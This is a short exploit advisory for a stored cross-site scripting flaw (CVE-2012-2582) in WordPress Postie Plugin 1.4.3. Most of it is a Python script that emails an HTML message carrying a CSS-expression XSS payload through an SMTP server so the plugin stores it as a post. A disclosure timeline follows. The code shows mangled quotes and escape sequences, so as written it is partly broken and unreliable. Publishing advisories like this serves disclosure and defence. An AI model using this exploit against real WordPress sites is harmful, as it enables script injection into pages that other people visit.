WordPress Postie Plugin Stored XSS Exploit

Summary

WordPress Postie Plugin 1.4.3 suffers from stored XSS vulnerability

Credit:

The information has been provided by loneferret.


Details

Vulnerable Systems:
 * WordPress Postie Plugin 1.4.3

import smtplib, urllib2

payload = ”'<IMG STYLE=’xss:expr/*XSS*/ession(alert(‘XSS’))’>”’

def sendMail(dstemail, frmemail, smtpsrv, username, password):
msg = ‘From: hacker@offsec.localn’
msg += ‘To: victim@victim.localn’
msg += ‘Date: Todayrn’
msg += ‘Subject: XSSn’
msg += ‘Content-type: text/htmlnn’
msg += ‘XSS’ + payload + ‘rnrn’
server = smtplib.SMTP(smtpsrv)
server.login(username,password)
try:
server.sendmail(frmemail, dstemail, msg)
except Exception, e:
print ‘[-] Failed to send email:’
print ‘[*] ‘ + str(e)
server.quit()

username = ‘hacker@offsec.local’
password = ‘123456’
dstemail = ‘victim@victim.local’
frmemail = ‘hacker@offsec.local’
smtpsrv = ‘172.16.84.171’

print ‘[*] Sending Email’
sendMail(dstemail, frmemail, smtpsrv, username, password)

CVE Information:
2012-2582

Disclosure Timeline:
29 May 2012: Vulnerability reported to CERT
30 May 2012: Response received from CERT with disclosure date set to 20 Jul 2012
23 Jul 2012: Update received from CERT. Vendor was advised to contact researcher. No other contact received.
08 Aug 2012: Public Disclosure

Categories: Exploits